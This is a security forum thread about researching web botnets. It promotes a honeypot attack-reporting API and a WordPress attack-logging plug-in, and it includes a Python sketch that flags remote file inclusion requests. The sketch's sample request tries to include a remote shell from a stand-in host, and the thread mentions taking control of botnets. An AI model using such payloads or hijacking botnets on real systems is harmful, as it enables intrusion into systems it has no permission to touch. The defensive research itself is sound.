Slaying dragons(botslayer)


bwall

For the past few months (even maybe half a year now), along with DigiP, I have been researching web botnets, attacks they use, and common web shells they use. As a result, we have been able to release products to help protect against their spreading attacks and released 2 exploits for taking down the botnets themselves.

The issue we have run into is that we have a limited amount of data/honeypots to work with. While we do have some collecting data, the data being gathered is somewhat limited. This is why I started the Attack-Analysis project. This project is designed to host a web API to post general attack information to when your webserver or honeypot receives an attack. This attack data is then pumped into a database, which is later analyzed by me to come up with details on these botnets, including exploits to take them down or, in a slightly less ethical manner, take control of them.

The details for the API are here: https://defense.ballastsecurity.net/wiki/index.php/Attack_Analysis

Another place that you can help is with the payload decoder, which archives and decodes RFI payloads. The details for that are here: https://defense.ballastsecurity.net/wiki/index.php/RFI_Payload_Decoder

and the results are currently hosted here along with the archived sources: https://defense.ballastsecurity.net/decoding/index.php

The exploits:

http://www.exploit-db.com/exploits/24883/

http://www.exploit-db.com/exploits/20168/

So if you want to help the good fight, please help out any way you can. I try to make everything I release as open source as possible, but some things need to stay a bit in the dark for security's sake, because I know botters follow my work.

Link to comment
Share on other sites

Very nice research :)

Only 1 small thing crossed my mind reading the Attack Analysis. You're accepting any kind of connection. No check for users or unique codes? Won't you run the risk of getting false info spammed?

Anyways, I'll maybe look to set a small honeypot for it :)

Link to comment
Share on other sites

We get plenty of spam already, but I think bwall has most of that filtered out. The main thing is to get others to contribute attack data from their own sites, and that is one of the reasons we developed the Attack Scanner plug-in for WordPress, which takes the guesswork out of a lot of it for people but also provides a firewall at the same time if you purchase the pro version. The free version is only a logging utility, but the Pro version not only has a firewall that blocks the attacks, it also checks for more types of attacks than the free version does. If you run a WordPress site, using our plug-in is one easy way to help, but if you have access to full-blown web hosts and want to build honeypots, bwall's API is the better way to go since it does a lot more than our WordPress plug-in and works without any CMS needed. It just requires a webserver with the software to run the scripts.

Edited by digip
Link to comment
Share on other sites

Yes, as DigiP said, I have filtering methods in place and I confirm information before I merge it into a local database I'm using to conduct the research on. There is also value in gathering information on those who are trying to submit spam/erroneous information.

If you are looking for the Attack Scanner link, it's in DigiP's signature, but in case that changes at some point, here it is: http://www.attack-scanner.com/

If you are looking to develop an application/honeypot that will submit information to the API, feel free to contact me about implementation code in the language you are using.

Link to comment
Share on other sites

  • 3 weeks later...

At one time we envisioned porting snort and nmap rules from things we logged, but right now, we're focused more on gathering intel on attacks, blocking them, and also downloading files attackers attempt to upload, which is part of the new API added to Attack Scanner Pro. At some point, it's going to be its own standalone form that requires no CMS or plug-in to run, so that's the goal, but right now it's collect, dissect and dismantle the bots we capture. Now might be the time to deploy the API from the pro version into the next free version update, since we've got over 1000 installs of the free version running out there, collecting data. It just doesn't check for nearly as many things as the pro version, nor does it have any firewall tools built in to block attacks. It's strictly a logging utility, whereas the pro version does both logging and blocking, and also looks for more attacks than what is in the free version.

Comparison (Scroll down):

http://www.attack-scanner.com/wordpress-attack-scannerfree/

Bwall has some things up his sleeves to implement even further as well, so anyone wanting to help run the API version and help contribute stats is more than welcome to come on board and join the fun.

Link to comment
Share on other sites

Yes, I have read all of that, DigiP. But I wonder if it's possible to have a pfSense plugin that does that detection and sends the information towards you guys. Because it's way easier to put something like this on the firewall of webservers than to add it on every site itself.

Link to comment
Share on other sites

I'm sure it could be done. I've never used snort or pfSense so I don't know how the rules work and how it sets up alerts, but we do GeoIP lookup data, pull the full string from the attacker, their cookies, files they try to upload, etc. It's not merely just check rule, block, forward alert type of stuff, but Bwall might be more familiar with snort and whether it can do what you ask. That would be really cool to pool other tools into the mix that can adapt and gather/do much of the same thing while still sending us all the same info we're pulling now.

Here is an example of the basic info we pull, and this doesn't include what's in the new API, which pulls even more info such as the cookies and actual attempted upload files an attacker sends to the server:

The top portion displays in WordPress on the logs, and can also be exported to CSV. The bottom portion also shows, but we also plot it on a Google map with the corresponding info for a more visual idea of where attacks originate from and show up.

(
    [ip] => x.x.x.x
    [attack] => Predefined attack class names go here based on what is in the plug-in
    [date] => 2013-04-01 04:25:10
    [hostaddress] => resolved hostname if any, otherwise, just the x.x.x.x shows here
    [browser] => User agent, including tools such as libwww/perl, php, or detection of telnet or no string used with scripts not sending an agent.
    [referred] => if they came in from a local link or external site
    [method] => get, head, options, fake, anything, if it's in the request, we'll see it and log it as such
    [text] => http://fullsiteurl.com/attackstringdata
    [rfi] => /attackstringdata
    [ipInformation] => stdClass Object
        (
            [data] => stdClass Object
                (
                    [CountryCode] => Country code
                    [IP] => x.x.x.x
                    [CountryName] => Country name
                    [Region] => State ID
                    [City] => City
                    [PostalCode] => Zip Code
                    [Latitude] => geo IP lat
                    [Longitude] => geo IP lat
                    [Hostname] => resolved name
                )

            [ip] => x.x.x.x
        )

)

It's basically just serialized data based on what we capture, then json'ed out after sanitizing any data captured.

Sample pic of the world map with just the top 1000 hits. This is only adjusted to the top 1000, since some months (we rotate logs twice a month due to the size) it's so large, Google Maps won't even load if there are too many pushpins: http://www.attack-scanner.com/images/april-sample.png

Each month is different with varying amounts of data. One thing we don't log, which I have a whole other plug-in for just to make users aware, is a Login Alerts plug-in that shows login attempts. It was never meant to be more than a warning for myself when people attack, but others using it now want all kinds of things added on, which given time I might do, and work into some sort of central logging place like we have with the other central logs. It was made more or less for my own needs and I threw it up on WordPress.org for free, but I have a version of my own modded to collect brute force attempts and log all the data, which acts as a honeypot:

http://www.attack-scanner.com/brutes/brutes.log

On the snort and pfSense stuff, I'd say try hitting up bwall on Twitter if he doesn't get back to here with an answer. He's hella busy, but I know we want as much data as possible and he may be able to write something that does much of the same. If the data gets sent to him how he wants, he can do the lookups and such on our end, so that's not as important as the attacking IP, files, agent, cookies and the attack string are, where we can sort of derive the rest of the data on our own.

This is still a learning process, but also something that we've been working on in spare time, so we don't spend 8 hours a day every day dealing with this since we have regular day jobs. http://www.attack-scanner.com/papers-and-info/

Link to comment
Share on other sites
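A sketch of how a honeypot could assemble the record described in the post above from one raw HTTP request. This is an added example, not code from Attack Scanner or the Attack-Analysis API: the RFI pattern and the "rfi" class name are assumptions, only the field names come from the thread, and the hostname and GeoIP lookups are left to the receiving side as the post suggests.

```python
import json
import re
from datetime import datetime, timezone
from urllib.parse import parse_qsl, urlsplit

# Hypothetical pattern and class name; the plug-in's real attack classes are not in the thread.
RFI_VALUE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
CONTROL = re.compile(r"[\x00-\x1f\x7f]")

def clean(value, limit=2048):
    """Drop control characters and cap length so a logged value cannot forge log lines."""
    return CONTROL.sub("", value or "")[:limit]

def classify(target):
    """Return "rfi" when a query parameter value is itself a remote URL, else None."""
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if RFI_VALUE.match(value):
            return "rfi"
    return None

def build_record(ip, raw_request, when=None):
    """Build a record using the thread's field names from one raw HTTP request."""
    head = raw_request.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = head[0].split(" ")
    method, target = parts[0], (parts[1] if len(parts) > 1 else "/")
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in head[1:])}
    attack = classify(target)
    if attack is None:
        return None  # nothing matched, nothing to report
    when = when or datetime.now(timezone.utc)
    return {
        "ip": ip,
        "attack": attack,
        "date": when.strftime("%Y-%m-%d %H:%M:%S"),
        "browser": clean(headers.get("user-agent")),
        "referred": clean(headers.get("referer")),
        "method": clean(method, 32),
        "text": clean("http://" + headers.get("host", "") + target),
        "rfi": clean(target),
    }

# Constructed sample; 192.0.2.10 and the .example hostnames are documentation values.
SAMPLE = ("GET /index.php?page=http://bad.example/shell.txt? HTTP/1.1\r\n"
          "Host: honeypot.example\r\nUser-Agent: libwww-perl/6.05\r\n\r\n")

if __name__ == "__main__":
    print(json.dumps(build_record("192.0.2.10", SAMPLE), indent=2))
```
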

Snort only does detection on a packet by packet basis (correct me if I'm wrong, it's been a while), so I don't believe snort would work as a total solution, as different attacks can easily span more than one packet. I was thinking of writing an Apache/Nginx module that sent attack data, so at least that would handle vhosts. I'm still working on this though. Currently, I'm trying to find a good way to set up an easy to use SDK from various languages so attacks can be reported from plugins/IDSs/etc. I also have a few less public things as well, at least until I can get a good idea of how well they work out.

Link to comment
Share on other sites
